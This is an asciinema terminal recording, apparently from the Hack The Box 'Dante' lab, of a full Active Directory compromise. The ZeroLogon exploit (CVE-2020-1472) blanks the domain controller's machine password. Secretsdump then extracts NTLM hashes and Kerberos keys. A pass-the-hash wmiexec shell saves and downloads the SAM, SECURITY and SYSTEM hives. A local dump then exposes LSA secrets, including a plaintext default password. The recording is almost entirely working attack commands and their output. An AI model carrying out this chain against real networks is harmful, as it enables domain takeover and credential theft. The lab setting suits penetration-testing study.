{"version":2,"width":101,"height":36,"timestamp":1714642942,"env":{"SHELL":"/usr/bin/zsh","TERM":"xterm-256color"}}
[0.142768, "o", "                                                                                                     \r\r\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007"]
[0.172526, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[0.172578, "o", "\u001b[?1h\u001b="]
[0.172972, "o", "\u001b[?2004h"]
[1.473122, "o", "\u001b[36ml\u001b[39m"]
[1.474344, "o", "\b\u001b[36ml\u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\b"]
[1.542782, "o", "\b\u001b[36ml\u001b[36ms\u001b[39m"]
[1.675281, "o", "\u001b[?1l\u001b>"]
[1.677959, "o", "\u001b[?2004l\r\r\n"]
[1.679752, "o", "cve-2020-1472-exploit.py  DANTE-DC01-ZeroLogon.cast  README.md  \u001b[0m\u001b[01;34mrelaying\u001b[0m  restorepassword.py\r\n"]
[1.68035, "o", "                                                                                                     \r\r\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[1.726237, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[1.726408, "o", "\u001b[?1h\u001b="]
[1.726844, "o", "\u001b[?2004h"]
[6.467794, "o", "\u001b[7m\u001b[36mproxychains4\u001b[39m\u001b[7m python3 \u001b[1m\u001b[7mcve-2020-1472-exploit.py\u001b[0m DANTE-DC01 172.16.1.20\u001b[27m"]
[6.893386, "o", "\u001b[68D\u001b[27m\u001b[36mp\u001b[27m\u001b[36mr\u001b[27m\u001b[36mo\u001b[27m\u001b[36mx\u001b[27m\u001b[36my\u001b[27m\u001b[36mc\u001b[27m\u001b[36mh\u001b[27m\u001b[36ma\u001b[27m\u001b[36mi\u001b[27m\u001b[36mn\u001b[27m\u001b[36ms\u001b[27m\u001b[36m4\u001b[39m\u001b[27m \u001b[27mp\u001b[27my\u001b[27mt\u001b[27mh\u001b[27mo\u001b[27mn\u001b[27m3\u001b[27m \u001b[27m\u001b[1mc\u001b[27m\u001b[1mv\u001b[27m\u001b[1me\u001b[27m\u001b[1m-\u001b[27m\u001b[1m2\u001b[27m\u001b[1m0\u001b[27m\u001b[1m2\u001b[27m\u001b[1m0\u001b[27m\u001b[1m-\u001b[27m\u001b[1m1\u001b[27m\u001b[1m4\u001b[27m\u001b[1m7\u001b[27m\u001b[1m2\u001b[27m\u001b[1m-\u001b[27m\u001b[1me\u001b[27m\u001b[1mx\u001b[27m\u001b[1mp\u001b[27m\u001b[1ml\u001b[27m\u001b[1mo\u001b[27m\u001b[1mi\u001b[27m\u001b[1mt\u001b[27m\u001b[1m.\u001b[27m\u001b[1mp\u001b[27m\u001b[1my\u001b[0m\u001b[27m \u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m-\u001b[27mD\u001b[27mC\u001b[27m0\u001b[27m1\u001b[27m \u001b[27m1\u001b[27m7\u001b[27m2\u001b[27m.\u001b[27m1\u001b[27m6\u001b[27m.\u001b[27m1\u001b[27m.\u001b[27m2\u001b[27m0"]
[6.893526, "o", "\u001b[?1l\u001b>"]
[6.899908, "o", "\u001b[?2004l\r\r\n"]
[6.901269, "o", "[proxychains] config file found: /etc/proxychains4.conf\r\n[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4\r\n"]
[6.90226, "o", "[proxychains] DLL init: proxychains-ng 4.17\r\n"]
[7.011938, "o", "Performing authentication attempts...\r\n"]
[7.012568, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[7.161099, "o", " ...  172.16.1.20:135 "]
[7.736216, "o", " ...  OK\r\n"]
[8.219264, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[8.389623, "o", " ...  172.16.1.20:49158 "]
[9.0117, "o", " ...  OK\r\n"]
[9.807915, "o", "="]
[10.340268, "o", "="]
[10.870204, "o", "="]
[11.401283, "o", "="]
[11.931347, "o", "="]
[12.464151, "o", "="]
[12.996581, "o", "="]
[13.531565, "o", "="]
[14.061972, "o", "="]
[14.594278, "o", "="]
[15.125183, "o", "="]
[15.656797, "o", "="]
[16.190849, "o", "="]
[16.722705, "o", "="]
[17.253823, "o", "="]
[17.782848, "o", "="]
[18.314729, "o", "="]
[18.844616, "o", "="]
[19.37472, "o", "="]
[19.908137, "o", "="]
[20.440163, "o", "="]
[20.977809, "o", "="]
[21.507253, "o", "="]
[22.037006, "o", "="]
[22.566492, "o", "="]
[23.100356, "o", "="]
[23.642802, "o", "="]
[24.172973, "o", "\r\nTarget vulnerable, changing account password to empty string\r\n"]
[24.462609, "o", "\r\nResult: 0\r\n\r\nExploit complete!\r\n"]
[24.486402, "o", "                                                                                                     \r\r"]
[24.48648, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007"]
[24.486519, "o", "\r\n"]
[24.52285, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[24.522953, "o", "\u001b[?1h\u001b="]
[24.523495, "o", "\u001b[?2004h"]
[33.373815, "o", "\u001b[7m\u001b[36mproxychains4\u001b[39m\u001b[7m secretsdump.py DANTE.local/DANTE-DC01\\$@172.16.1.20 \u001b[7m\u001b[32m-no-pass\u001b[27m\u001b[39m"]
[33.993583, "o", "\u001b[73D\u001b[27m\u001b[36mp\u001b[27m\u001b[36mr\u001b[27m\u001b[36mo\u001b[27m\u001b[36mx\u001b[27m\u001b[36my\u001b[27m\u001b[36mc\u001b[27m\u001b[36mh\u001b[27m\u001b[36ma\u001b[27m\u001b[36mi\u001b[27m\u001b[36mn\u001b[27m\u001b[36ms\u001b[27m\u001b[36m4\u001b[39m\u001b[27m \u001b[27ms\u001b[27me\u001b[27mc\u001b[27mr\u001b[27me\u001b[27mt\u001b[27ms\u001b[27md\u001b[27mu\u001b[27mm\u001b[27mp\u001b[27m.\u001b[27mp\u001b[27my\u001b[27m \u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m.\u001b[27ml\u001b[27mo\u001b[27mc\u001b[27ma\u001b[27ml\u001b[27m/\u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m-\u001b[27mD\u001b[27mC\u001b[27m0\u001b[27m1\u001b[27m\\\u001b[27m$\u001b[27m@\u001b[27m1\u001b[27m7\u001b[27m2\u001b[27m.\u001b[27m1\u001b[27m6\u001b[27m.\u001b[27m1\u001b[27m.\u001b[27m2\u001b[27m0\u001b[27m \u001b[27m\u001b[32m-\u001b[27m\u001b[32mn\u001b[27m\u001b[32mo\u001b[27m\u001b[32m-\u001b[27m\u001b[32mp\u001b[27m\u001b[32ma\u001b[27m\u001b[32ms\u001b[27m\u001b[32ms\u001b[39m"]
[33.99362, "o", "\u001b[?1l\u001b>"]
[33.996583, "o", "\u001b[?2004l\r\r\n"]
[33.997478, "o", "[proxychains] config file found: /etc/proxychains4.conf\r\n[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4\r\n"]
[33.998006, "o", "[proxychains] DLL init: proxychains-ng 4.17\r\n"]
[34.170701, "o", "Impacket v0.11.0 - Copyright 2023 Fortra\r\n\r\n"]
[34.172129, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[34.31935, "o", " ...  172.16.1.20:445 "]
[34.901319, "o", " ...  OK\r\n"]
[37.332364, "o", "[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied \r\n"]
[39.514442, "o", "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\r\n"]
[39.514461, "o", "[*] Using the DRSUAPI method to get NTDS.DIT secrets\r\n"]
[40.012123, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[40.161916, "o", " ...  172.16.1.20:135 "]
[40.749191, "o", " ...  OK\r\n"]
[41.244508, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[41.399358, "o", " ...  172.16.1.20:49155 "]
[41.972365, "o", " ...  OK\r\n"]
[43.335165, "o", "Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::\r\n"]
[43.826798, "o", "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[44.319937, "o", "krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49e6f37ede481d09747f6a0c9abcbaa7:::\r\n"]
[44.811946, "o", "DANTE.local\\SelfHealUser:1001:aad3b435b51404eeaad3b435b51404ee:236a174dfe9cf1f702ae493d934fb70e:::\r\n"]
[45.320573, "o", "DANTE.local\\katwamba:1002:aad3b435b51404eeaad3b435b51404ee:14a71f9e65448d83e8c63d46355837c3:::\r\n"]
[45.813065, "o", "mrb3n:2104:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::\r\n"]
[46.304621, "o", "DANTE.local\\xadmin:7104:aad3b435b51404eeaad3b435b51404ee:649f65073a6672a9898cb4eb61f9684a:::\r\n"]
[46.794192, "o", "DANTE-DC01$:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[47.284325, "o", "MediaAdmin$:1117:aad3b435b51404eeaad3b435b51404ee:329a2dc60237f61dc10042bc118d9a40:::\r\n"]
[47.285401, "o", "[*] Kerberos keys grabbed\r\nkrbtgt:aes256-cts-hmac-sha1-96:1e16c72322ec508e1c1312b472a615a43759fe6a97fe4644a427821c7806dd01\r\nkrbtgt:aes128-cts-hmac-sha1-96:42f40cdeb3c715570710371922f5d997\r\nkrbtgt:des-cbc-md5:02fba8ba0de3f157\r\n"]
[47.285461, "o", "DANTE.local\\SelfHealUser:aes256-cts-hmac-sha1-96:284ab155434058eac6064e31ba928f90bbdb1afa8387b8632c13e5f53604e33b\r\nDANTE.local\\SelfHealUser:aes128-cts-hmac-sha1-96:c72c0b84eb7e2b7a386ab23d3265c680\r\nDANTE.local\\SelfHealUser:des-cbc-md5:5d8cbfe67ae3f20d\r\nDANTE.local\\katwamba:aes256-cts-hmac-sha1-96:7dba6bec2703807ffe586e927a3e1c7ea7a610bc025d29c5db2656b1a6be437b\r\nDANTE.local\\katwamba:aes128-cts-hmac-sha1-96:38f3e73169b94345c72b257294949518\r\nDANTE.local\\katwamba:des-cbc-md5:a2765161d04c8301\r\nmrb3n:aes256-cts-hmac-sha1-96:c7dc1b6a6c05c8b01566cf039484a74c094580b740f36a95d117705b66698649\r\nmrb3n:aes128-cts-hmac-sha1-96:56c18f870282cb50fbe28cc6fc9321aa\r\nmrb3n:des-cbc-md5:b3da68b0d67ac8df\r\nDANTE.local\\xadmin:aes256-cts-hmac-sha1-96:964ceb40ec542d105c3a60ec9a8fff1eddae78a86a659eabe11a76f5c525a651\r\nDANTE.local\\xadmin:aes128-cts-hmac-sha1-96:b14d3dc24903c71f63a98acd6301dd7d\r\nDANTE.local\\xadmin:des-cbc-md5:f8ae31d0a76891a1\r\nDANTE-DC01$:aes256-cts-hmac-sha1-96:7abe45ab2fea451bceb7cc59fa49a5ed501a29d092d2353f10c6a19507098ca4\r\nDANTE-DC01$:aes128-cts-hmac-sha1-96:8c4d2b3e093a04f5582aa371f677fcd5\r\nDANTE-DC01$:des-cbc-md5:3bf18301b6a48079\r\nMediaAdmin$:aes256-cts-hmac-sha1-96:8fa35bafb81267ff543e025ee7b039019e2b3db9d1cf0fb175cf7087d570c6d1\r\nMediaAdmin$:aes128-cts-hmac-sha1-96:228c188e67b138d34772ac5078bb7c0a\r\n"]
[47.285468, "o", "MediaAdmin$:des-cbc-md5:ef68cbd9383eb908\r\n"]
[47.285573, "o", "[*] Cleaning up... \r\n"]
[47.564535, "o", "                                                                                                     \r\r"]
[47.564646, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[47.59767, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[47.597753, "o", "\u001b[?1h\u001b="]
[47.598222, "o", "\u001b[?2004h"]
[49.871558, "o", "\u001b[7m\u001b[36mproxychains4\u001b[39m\u001b[7m wmiexec.py \u001b[7m\u001b[32m-hashes\u001b[39m\u001b[7m aad3b435b51404eeaad3b435b51404ee:14a71f9e65448d83e8c63d46355837c3\u001b[7m \u001b[7mDANTE.local/katwamba@172.16.1.20\u001b[27m\u001b[K"]
[50.638995, "o", "\u001b[A\u001b[29D\u001b[27m\u001b[36mp\u001b[27m\u001b[36mr\u001b[27m\u001b[36mo\u001b[27m\u001b[36mx\u001b[27m\u001b[36my\u001b[27m\u001b[36mc\u001b[27m\u001b[36mh\u001b[27m\u001b[36ma\u001b[27m\u001b[36mi\u001b[27m\u001b[36mn\u001b[27m\u001b[36ms\u001b[27m\u001b[36m4\u001b[39m\u001b[27m \u001b[27mw\u001b[27mm\u001b[27mi\u001b[27me\u001b[27mx\u001b[27me\u001b[27mc\u001b[27m.\u001b[27mp\u001b[27my\u001b[27m \u001b[27m\u001b[32m-\u001b[27m\u001b[32mh\u001b[27m\u001b[32ma\u001b[27m\u001b[32ms\u001b[27m\u001b[32mh\u001b[27m\u001b[32me\u001b[27m\u001b[32ms\u001b[39m\u001b[27m \u001b[27ma\u001b[27ma\u001b[27md\u001b[27m3\u001b[27mb\u001b[27m4\u001b[27m3\u001b[27m5\u001b[27mb\u001b[27m5\u001b[27m1\u001b[27m4\u001b[27m0\u001b[27m4\u001b[27me\u001b[27me\u001b[27ma\u001b[27ma\u001b[27md\u001b[27m3\u001b[27mb\u001b[27m4\u001b[27m3\u001b[27m5\u001b[27mb\u001b[27m5\u001b[27m1\u001b[27m4\u001b[27m0\u001b[27m4\u001b[27me\u001b[27me\u001b[27m:\u001b[27m1\u001b[27m4\u001b[27ma\u001b[27m7\u001b[27m1\u001b[27mf\u001b[27m9\u001b[27me\u001b[27m6\u001b[27m5\u001b[27m4\u001b[27m4\u001b[27m8\u001b[27md\u001b[27m8\u001b[27m3\u001b[27me\u001b[27m8\u001b[27mc\u001b[27m6\u001b[27m3\u001b[27md\u001b[27m4\u001b[27m6\u001b[27m3\u001b[27m5\u001b[27m5\u001b[27m8\u001b[27m3\u001b[27m7\u001b[27mc\u001b[27m3 \u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m.\u001b[27ml\u001b[27mo\u001b[27mc\u001b[27ma\u001b[27ml\u001b[27m/\u001b[27mk\u001b[27ma\u001b[27mt\u001b[27mw\u001b[27ma\u001b[27mm\u001b[27mb\u001b[27ma\u001b[27m@\u001b[27m1\u001b[27m7\u001b[27m2\u001b[27m.\u001b[27m1\u001b[27m6\u001b[27m.\u001b[27m1\u001b[27m.\u001b[27m2\u001b[27m0"]
[52.678162, "o", "\u001b[?1l\u001b>"]
[52.68753, "o", "\u001b[?2004l\r\r\n"]
[52.68878, "o", "[proxychains] config file found: /etc/proxychains4.conf\r\n"]
[52.688807, "o", "[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4\r\n"]
[52.689654, "o", "[proxychains] DLL init: proxychains-ng 4.17\r\n"]
[52.915522, "o", "Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation\r\n\r\n"]
[52.916864, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[53.065167, "o", " ...  172.16.1.20:445 "]
[53.639411, "o", " ...  OK\r\n"]
[54.617514, "o", "[*] SMBv3.0 dialect used\r\n"]
[54.617655, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[54.764814, "o", " ...  172.16.1.20:135 "]
[55.346556, "o", " ...  OK\r\n"]
[55.992586, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[64.000817, "o", " ...  timeout\r\n"]
[64.001101, "o", "[-] Could not connect: [Errno 111] Connection refused\r\n"]
[64.270906, "o", "                                                                                                     \r\r"]
[64.271318, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[64.302381, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[64.302478, "o", "\u001b[?1h\u001b="]
[64.302873, "o", "\u001b[?2004h"]
[74.997429, "o", "\u001b[36mproxychains4\u001b[39m wmiexec.py \u001b[32m-hashes\u001b[39m aad3b435b51404eeaad3b435b51404ee:14a71f9e65448d83e8c63d46355837c3 DANTE.local/katwamba@172.16.1.20\u001b[K"]
[75.304092, "o", "\u001b[?1l\u001b>"]
[75.3133, "o", "\u001b[?2004l\r\r\n"]
[75.314592, "o", "[proxychains] config file found: /etc/proxychains4.conf\r\n[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4\r\n"]
[75.315427, "o", "[proxychains] DLL init: proxychains-ng 4.17\r\n"]
[75.538924, "o", "Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation\r\n\r\n"]
[75.540225, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[75.687121, "o", " ...  172.16.1.20:445 "]
[76.27416, "o", " ...  OK\r\n"]
[77.245936, "o", "[*] SMBv3.0 dialect used\r\n"]
[77.246075, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[77.416361, "o", " ...  172.16.1.20:135 "]
[78.042385, "o", " ...  OK\r\n"]
[78.755298, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[78.902116, "o", " ...  172.16.1.20:49154 "]
[79.477401, "o", " ...  OK\r\n"]
[87.029873, "o", "[!] Launching semi-interactive shell - Careful what you execute\r\n[!] Press help for extra shell commands\r\n"]
[87.029916, "o", "C:\\>"]
[95.246015, "o", "reg save hklm\\sam C:\\sam.save"]
[96.527716, "o", "\r\n"]
[99.354405, "o", "The operation completed successfully.\r\r\r\n\r\n"]
[99.354425, "o", "C:\\>"]
[107.870432, "o", "reg save hklm\\security C:\\security.save"]
[108.408215, "o", "\r\n"]
[111.228158, "o", "The operation completed successfully.\r\r\r\n\r\nC:\\>"]
[114.588574, "o", "reg save hklm\\system C:\\system.save"]
[114.998237, "o", "\r\n"]
[117.822176, "o", "The operation completed successfully.\r\r\r\n\r\n"]
[117.822196, "o", "C:\\>"]
[118.941983, "o", "h"]
[119.091941, "o", "e"]
[119.302165, "o", "l"]
[119.496024, "o", "p"]
[119.751012, "o", "\r\n"]
[119.751102, "o", "\r\n lcd {path}                 - changes the current local directory to {path}\r\n exit                       - terminates the server process (and this session)\r\n lput {src_file, dst_path}   - uploads a local file to the dst_path (dst_path = default current directory)\r\n lget {file}                 - downloads pathname to the current local dir\r\n ! {cmd}                    - executes a local shell cmd\r\n\r\n"]
[119.751135, "o", "C:\\>"]
[121.362815, "o", "l"]
[121.685421, "o", "g"]
[122.014976, "o", "e"]
[122.164887, "o", "t"]
[122.308003, "o", " "]
[127.2861, "o", "sam.save"]
[128.289995, "o", "\r\n"]
[128.290239, "o", "[*] Downloading C:\\\\sam.save\r\n"]
[129.990146, "o", "C:\\>"]
[132.63078, "o", "l"]
[132.937924, "o", "g"]
[133.042978, "o", "e"]
[133.163073, "o", "t"]
[133.261109, "o", " "]
[136.147004, "o", "security.save"]
[136.828895, "o", "\r\n"]
[136.829166, "o", "[*] Downloading C:\\\\security.save\r\n"]
[138.606255, "o", "C:\\>"]
[139.812828, "o", "l"]
[140.142819, "o", "g"]
[140.24777, "o", "e"]
[140.368723, "o", "t"]
[140.487716, "o", " "]
[144.139429, "o", "system.save"]
[144.521068, "o", "\r\n"]
[144.521355, "o", "[*] Downloading C:\\\\system.save\r\n"]
[160.51922, "o", "C:\\>"]
[161.40404, "o", "d"]
[161.508102, "o", "e"]
[162.243201, "o", "l"]
[162.288012, "o", " "]
[164.995209, "o", "sam.save"]
[165.378653, "o", "\r\n"]
[167.95529, "o", "\r\n"]
[167.955317, "o", "C:\\>"]
[168.458015, "o", "d"]
[168.540957, "o", "e"]
[168.69025, "o", "l"]
[168.834384, "o", " "]
[172.004107, "o", "security.save"]
[172.374696, "o", "\r\n"]
[174.946952, "o", "\r\n"]
[174.947004, "o", "C:\\>"]
[175.707931, "o", "d"]
[175.759825, "o", "e"]
[176.000022, "o", "l"]
[176.08227, "o", " "]
[178.542203, "o", "system.save"]
[178.81364, "o", "\r\n"]
[181.865764, "o", "\r\n"]
[181.865786, "o", "C:\\>"]
[182.476836, "o", "\r\n"]
[182.746988, "o", "                                                                                                     \r\r"]
[182.747083, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[182.785521, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[182.785624, "o", "\u001b[?1h\u001b="]
[182.786036, "o", "\u001b[?2004h"]
[183.838578, "o", "\u001b[36ml\u001b[39m"]
[183.839849, "o", "\b\u001b[36ml\u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\b"]
[183.880649, "o", "\b\u001b[36ml\u001b[36ms\u001b[39m"]
[184.007516, "o", "\u001b[?1l\u001b>"]
[184.008816, "o", "\u001b[?2004l\r\r\n"]
[184.009914, "o", "cve-2020-1472-exploit.py   README.md  restorepassword.py  security.save\r\nDANTE-DC01-ZeroLogon.cast  \u001b[0m\u001b[01;34mrelaying\u001b[0m   sam.save            system.save\r\n"]
[184.010019, "o", "                                                                                                     \r\r"]
[184.010094, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007\r\n"]
[184.038036, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[184.03813, "o", "\u001b[?1h\u001b="]
[184.038538, "o", "\u001b[?2004h"]
[186.477186, "o", "\u001b[1ms\u001b[0m"]
[186.478653, "o", "\b\u001b[1ms\u001b[0m\u001b[38;2;153;153;153mecretsdump.py -sam sam.save -system system.save -security security.save LOCAL\u001b[39m\u001b[77D"]
[188.236962, "o", "\b\u001b[0m\u001b[36ms\u001b[36me\u001b[36mc\u001b[36mr\u001b[36me\u001b[36mt\u001b[36ms\u001b[36md\u001b[36mu\u001b[36mm\u001b[36mp\u001b[36m.\u001b[36mp\u001b[36my\u001b[39m\u001b[39m \u001b[32m-\u001b[32ms\u001b[32ma\u001b[32mm\u001b[39m\u001b[39m \u001b[39m\u001b[1ms\u001b[39m\u001b[1ma\u001b[39m\u001b[1mm\u001b[39m\u001b[1m.\u001b[39m\u001b[1ms\u001b[39m\u001b[1ma\u001b[39m\u001b[1mv\u001b[39m\u001b[1me\u001b[0m\u001b[39m \u001b[32m-\u001b[32ms\u001b[32my\u001b[32ms\u001b[32mt\u001b[32me\u001b[32mm\u001b[39m\u001b[39m \u001b[39m\u001b[1ms\u001b[39m\u001b[1my\u001b[39m\u001b[1ms\u001b[39m\u001b[1mt\u001b[39m\u001b[1me\u001b[39m\u001b[1mm\u001b[39m\u001b[1m.\u001b[39m\u001b[1ms\u001b[39m\u001b[1ma\u001b[39m\u001b[1mv\u001b[39m\u001b[1me\u001b[0m\u001b[39m \u001b[32m-\u001b[32ms\u001b[32me\u001b[32mc\u001b[32mu\u001b[32mr\u001b[32mi\u001b[32mt\u001b[32my\u001b[39m\u001b[39m \u001b[39m\u001b[1ms\u001b[39m\u001b[1me\u001b[39m\u001b[1mc\u001b[39m\u001b[1mu\u001b[39m\u001b[1mr\u001b[39m\u001b[1mi\u001b[39m\u001b[1mt\u001b[39m\u001b[1my\u001b[39m\u001b[1m.\u001b[39m\u001b[1ms\u001b[39m\u001b[1ma\u001b[39m\u001b[1mv\u001b[39m\u001b[1me\u001b[0m\u001b[39m \u001b[39mL\u001b[39mO\u001b[39mC\u001b[39mA\u001b[39mL"]
[190.70389, "o", "\u001b[?1l\u001b>"]
[190.71189, "o", "\u001b[?2004l\r\r\n"]
[190.894, "o", "Impacket v0.11.0 - Copyright 2023 Fortra\r\n\r\n"]
[190.902125, "o", "[*] Target system bootKey: 0xf0ec920edb5e772deff87b234eca175a\r\n"]
[190.907147, "o", "[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\r\n"]
[190.912108, "o", "Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::\r\n"]
[190.91392, "o", "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[190.920572, "o", "[*] Dumping cached domain logon information (domain/username:hash)\r\n"]
[190.933792, "o", "[*] Dumping LSA Secrets\r\n"]
[190.936579, "o", "[*] $MACHINE.ACC \r\n"]
[190.936648, "o", "$MACHINE.ACC:plain_password_hex:729b7531c42a7287cc439da7ac8469becc39653cda954cc0f00bf02f2e7aa785dcaa10bfd2aefefe4fd7e99d7b9dd6e1832ca886a21d5f3ff292333ebb2c51e436a67c2eda18e75a51a974b3706a571bb87a8dba6d15b5eceb59f43b1016bed372121e5975d8c70e25e1c1f3b709325a21a82ddf3f42e6bb11f0ce5a62424ca58237907e5ed686ed85b6e2a10907b8428f8616cfa990b2e31935cfea94df807ebed8a061bb790b83f31549ae49d75a20a8be30308c974438e673a05202ea8ad562be5ca31d490609b1f4e69d7ddc25935226ef16d60b9f0bd1df5600fa6a582203c13f3ec05c72e8828af8d41964bb3f\r\n$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d495ad3d6e40e99ffe269fb6ab82547c\r\n"]
[190.937888, "o", "[*] DefaultPassword \r\n(Unknown User):DishonestSupermanDiablo5679\r\n"]
[190.939083, "o", "[*] DPAPI_SYSTEM \r\n"]
[190.939118, "o", "dpapi_machinekey:0xb43a17dc9283a05fbbec6a22b216598ad49cea3e\r\ndpapi_userkey:0x15065e7548fab3c53d83d5ba032dbad1f2f5f2dc\r\n"]
[190.940318, "o", "[*] NL$KM \r\n"]
[190.940477, "o", " 0000   96 CA BE 6B E4 97 48 C6  78 D2 49 D0 F9 50 54 12   ...k..H.x.I..PT.\r\n 0010   D8 ED FA 60 81 CD A4 53  BA 63 BA 28 2F 83 36 59   ...`...S.c.(/.6Y\r\n 0020   58 6E 14 D4 7B DB 43 B7  70 9A 42 8E 35 1A D9 06   Xn..{.C.p.B.5...\r\n"]
[190.940492, "o", " 0030   81 77 BB 15 41 6A B9 98  FC 6E 51 9E 8E 16 A2 F1   .w..Aj...nQ.....\r\nNL$KM:96cabe6be49748c678d249d0f9505412d8edfa6081cda453ba63ba282f833659586e14d47bdb43b7709a428e351ad9068177bb15416ab998fc6e519e8e16a2f1\r\n"]
[190.943053, "o", "[*] _SC_{262E99C9-6160-4871-ACEC-4E61736B6F21}_MediaAdmin$ \r\n"]
[190.943078, "o", " 0000   8A 19 7A 0C 50 A5 0F 8E  AD 24 38 E0 A4 2D 2E 4C   ..z.P....$8..-.L\r\n 0010   42 17 87 77 D5 7E 34 B9  B0 A3 7C AB A7 12 2F 15   B..w.~4...|.../.\r\n"]
[190.943106, "o", " 0020   BE 4A 8C 5C AD 90 EA 3A  66 6E B3 DC B7 B1 7C 89   .J.\\...:fn....|.\r\n"]
[190.943134, "o", " 0030   73 E7 A2 5E EB EA 17 D2  38 AC C4 75 6D 0D FA A2   s..^....8..um...\r\n 0040   75 6B B1 23 71 84 59 76  E4 F1 EA 01 88 25 BF 61   uk.#q.Yv.....%.a\r\n"]
